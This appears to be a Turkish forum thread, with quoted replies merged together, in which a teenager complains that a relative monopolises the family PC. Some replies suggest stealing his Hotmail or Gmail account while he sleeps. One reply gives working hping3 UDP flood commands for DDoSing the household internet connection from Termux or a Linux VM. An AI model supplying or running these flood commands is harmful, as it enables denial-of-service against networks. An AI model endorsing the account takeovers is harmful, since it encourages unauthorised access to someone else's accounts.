Kanka tarif ettiğin yaratık, insana benzemiyor, senin yaş kaç bu arada? Vallaha şaka bir yana, büyük utanmazlık ya.. ne oynuyor bu cin arkadaş? Lol'mü? Hesabını çal bssjsjsjsjYok reis
Mesaj otomatik birleştirildi:
Gülme be sjskshskshsj sagolasin reis
Reis yaşım 16 adam lolcu oyun yüklüyor oynuyor battle feid 1 indirimdeyken alamadım diye ağzıma sictiKanka tarif ettiğin yaratık, insana benzemiyor, senin yaş kaç bu arada? Vallaha şaka bir yana, büyük utanmazlık ya.. ne oynuyor bu cin arkadaş? Lol'mü? Hesabını çal bssjsjsjsj
Para yokOna bir bilgisayar alıver.
Bir bakayım hocamTelefon android ise termuxdan arkadaşın dediği komutları uygula (sorumluluk sana ait)
Kanka yemin ederim büyük ayıp ama ya.. o kesin hotmailini açık bırakıyordur, uyurken çal hesabını, gmailinin sifresini değiştir hatta kökten, en olmadı şifre köy pc'ye , laf eden olursa "PC benim, ben oynayamıyorumx de..Reis yaşım 16 adam lolcu oyun yüklüyor oynuyor battle feid 1 indirimdeyken alamadım diye ağzıma sicti
Para yok![]()
Reis başka oyun oynuyorKanka yemin ederim büyük ayıp ama ya.. o kesin hotmailini açık bırakıyordur, uyurken çal hesabını, gmailinin sifresini değiştir hatta kökten, en olmadı şifre köy pc'ye
Çocuk yukarıdaki "sata kablosu" yazısına "oney" yazmış. Sence kendi internetine ddos atabilir mibaşka bir pc varsa orda sanal makineye linux kur
ddos at kendi internetine
sudo hping3 -I eth0 --udp --flood -p 80 ip adresini gir
sudo nice -n -20 hping3 -I eth0 --udp --flood -p 80 --data 1400 ip gir
(sadece yardımcı olunması için veriyorum
herhangi kötü niyet yok)
Ya kanka, bir hocaya falan git, cin musallatı diye yorumladım, bu nedir ya? Şifre koy, laf edersede "PC benim, ben oynayamıyorum" de, bırak boşver ya.Reis başka oyun oynuyor
Onu biliyorum ddos termux o işlerden anlarım yazılım benim işim ama sata kablosu diye ilkdefa gordumÇocuk yukarıdaki "sata kablosu" yazısına "oney" yazmış. Sence kendi internetine ddos atabilir mi![]()
Kilidi actirir zorla babam laf etmiyorya mkYa kanka, bir hocaya falan git, cin musallatı diye yorumladım, bu nedir ya? Şifre koy, laf edersede "PC benim, ben oynayamıyorum" de, bırak boşver ya.
Polise şikayet et ya, bu nedir ya vallaha ben tilt oldum. Adres at geliyorum.Onu biliyorum ddos termux o işlerden anlarım yazılım benim işim ama sata kablosu diye ilkdefa gordum
Kilidi actirir zorla babam laf etmiyorya mk
Çok iyi olur hocamPolise şikayet et ya, bu nedir ya vallaha ben tilt oldum. Adres at geliyorum.
Şuan oynuyor mu hocam? Tam şuan? Hele birde LoL oynuyorsa genelde, klavye sesinden de durulmaz ...Çok iyi olur hocam![]()